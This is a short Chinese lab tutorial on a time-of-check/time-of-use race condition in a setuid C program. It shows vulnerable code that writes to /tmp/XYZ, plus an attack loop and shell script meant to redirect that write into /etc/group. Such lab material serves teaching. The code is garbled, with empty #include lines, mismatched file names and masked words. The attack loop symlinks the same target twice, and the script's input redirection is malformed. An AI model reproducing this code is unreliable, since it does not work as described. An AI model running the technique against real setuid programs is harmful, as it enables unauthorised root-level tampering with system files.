0x00 含有s标志位的含义

beyes@debian:~$ ls -l getuid.exe 
-rwsr-xr-x 1 beyes beyes 5211 Jun 10 10:45 getuid.exe
beyes@debian:~$ chmod u+s tuo.a
beyes@debian:~$ ls -l tuo.a
-rwsr-xr-x 1 root root 7567 Jul  8 14:53 tuo.a

这两种在执行时的区别:
getuid()
geteuid()

0x01 漏洞代码,及×××目标

目标修改/etc/group文件

含有漏洞的代码vul.c如下:

/* vulp.c */
#include 
#include 
#include 
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        for(i=0; i < DELAY; i++){
            int a = i^2;
        }
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
}

编译如下:
gcc -o vul vul.c
chmod u+s vul

0x02 漏洞利用

在某一时刻,两个进程同时访问/tmp/XYZ文件。则会出现竞态条件漏洞。

×××代码:

int main()
{
    while(1){
        system("ln -sf  /etc/group  /tmp/XYZ");
        system("ln -sf /etc/group /tmp/XYZ");
    }
    return 0;
}

脚本:

#!/bin/sh
#注意`不是单引号
old=`ls -l /home/shiyanlou/seed/root_file`
new=`ls -l /home/shiyanlou/seed/root_file`
while [ "$old" = "$new" ]
do
    ./vulp < “hacked by endlif”
    new=`ls -l /home/shiyanlou/seed/root_file`
done
echo "STOP... The file has been changed"

参考:
https://www.zybuluo.com/zwh8800/note/816659

https://www.shiyanlou.com/courses/249